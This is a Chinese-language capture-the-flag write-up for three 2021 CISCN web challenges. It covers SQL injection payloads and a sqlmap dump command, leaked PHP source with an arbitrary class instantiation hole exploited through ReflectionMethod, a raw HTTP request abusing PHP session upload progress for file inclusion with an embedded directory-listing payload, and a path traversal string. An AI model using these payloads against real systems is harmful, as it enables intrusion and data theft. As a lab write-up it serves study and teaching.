WP - 2021ciscn
web
web1
union 被过滤,需要绕过
uname=-7591') OR 1 GROUP BY CONCAT(0x7162627171,(SELECT (CASE WHEN (9596=9596) THEN 1 ELSE 0 END)),0x71786a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&passwd=123&Submit=%E7%99%BB%E5%BD%95
sqlmap 可以直接跑出数据库名。
uname=admin') and (select from (select from flag as x join flag as y using(id,no)) as z)#&passwd=123&Submit=%E7%99%BB%E5%BD%95
python sqlmap.py -r 2.txt -D security -T flag -C 0c64d673-51d2-40e9-bb7d-11ff9d7961a7 --dump
easy_source
在 http://124.71.239.213:23133/.index.php.swo 发现泄露的源码:
<?php
class User
{
    // Counter shared by every instance and every method of this class.
    private static $c = 0;

    // Methods a() .. t() are deliberately identical: each one bumps the
    // shared counter and returns the new value. Line comments are used
    // here on purpose -- ReflectionMethod::getDocComment() only reports
    // doc comments that open with /**, so adding docblocks would change
    // what the reflection call in the writeup can read back.
    public function a()
    {
        self::$c += 1;
        return self::$c;
    }

    public function b()
    {
        self::$c += 1;
        return self::$c;
    }

    public function c()
    {
        self::$c += 1;
        return self::$c;
    }

    public function d()
    {
        self::$c += 1;
        return self::$c;
    }

    public function e()
    {
        self::$c += 1;
        return self::$c;
    }

    public function f()
    {
        self::$c += 1;
        return self::$c;
    }

    public function g()
    {
        self::$c += 1;
        return self::$c;
    }

    public function h()
    {
        self::$c += 1;
        return self::$c;
    }

    public function i()
    {
        self::$c += 1;
        return self::$c;
    }

    public function j()
    {
        self::$c += 1;
        return self::$c;
    }

    public function k()
    {
        self::$c += 1;
        return self::$c;
    }

    public function l()
    {
        self::$c += 1;
        return self::$c;
    }

    public function m()
    {
        self::$c += 1;
        return self::$c;
    }

    public function n()
    {
        self::$c += 1;
        return self::$c;
    }

    public function o()
    {
        self::$c += 1;
        return self::$c;
    }

    public function p()
    {
        self::$c += 1;
        return self::$c;
    }

    public function q()
    {
        self::$c += 1;
        return self::$c;
    }

    public function r()
    {
        self::$c += 1;
        return self::$c;
    }

    public function s()
    {
        self::$c += 1;
        return self::$c;
    }

    public function t()
    {
        self::$c += 1;
        return self::$c;
    }
}
// All four inputs come straight from the query string; none is validated.
$className  = $_GET["rc"];
$ctorSecond = $_GET["rb"];
$ctorFirst  = $_GET["ra"];
$methodName = $_GET["rd"];
// Sink: the class to instantiate, both constructor arguments and the
// zero-argument method to call are all request-controlled. The writeup's
// payload uses this with ReflectionMethod(User, a) and getDocComment to
// read a method's doc comment.
$instance = new $className($ctorFirst, $ctorSecond);
var_dump($instance->$methodName());
payload:
?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment
middle_source
session 路径:
/var/lib/php/sessions/beeeejdcfb
考点是 session 文件包含。
首先看能否创建session文件,用phpinfo进行检验。
验证成功后,尝试读取路径:
POST / HTTP/1.1
Host: 124.71.239.213:23204
Content-Length: 323
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWC3R56U8lDkCOsia
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fxxk123
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
------WebKitFormBoundaryWC3R56U8lDkCOsia
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
<?php
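/*
 * Recursively collect every non-directory path under $path into $files.
 *
 * $path  : directory (or single file) to walk.
 * $files : output array, appended to by reference; each entry is the full
 *          path built from $path with '/' separators.
 *
 * A $path that is not a directory (a regular file, or a path that does not
 * exist) is appended as-is, as in the original version. Directories that
 * cannot be opened are skipped instead of aborting the walk.
 */
function searchDir($path, &$files)
{
    if (is_dir($path)) {
        $handle = opendir($path);
        if ($handle === false) {
            // Unreadable directory: skip it rather than pass false to readdir().
            return;
        }
        // readdir() returns false at the end of the listing. Comparing with
        // !== false keeps entries whose name is falsy, e.g. a file named "0",
        // which a plain `while ($file = readdir(...))` would stop on.
        while (($entry = readdir($handle)) !== false) {
            if ($entry !== '.' && $entry !== '..') {
                searchDir($path . '/' . $entry, $files);
            }
        }
        closedir($handle);
        return;
    }
    $files[] = $path;
}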
// Convenience wrapper around searchDir(): walk $dir and return the
// collected file paths as a plain array.
function getDir($dir)
{
    $collected = [];
    searchDir($dir, $collected);
    return $collected;
}
// Walk the chosen tree and print one path per line, separated by HTML breaks.
$filenames = getDir('/etc');
foreach ($filenames as $entry) {
    echo "{$entry}<br/>";
}
?>
------WebKitFormBoundaryWC3R56U8lDkCOsia
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryWC3R56U8lDkCOsia--
遍历出了/etc下目录、子目录和文件。
保存到本地,稍微调整格式后,就容易看出目标文件。
最后的payload:cf=../../../../../../../etc/ddgiebfdea/gdbcgdejhd/ddcecebice/aaajfjadah/aidfafgcaa/fl444444g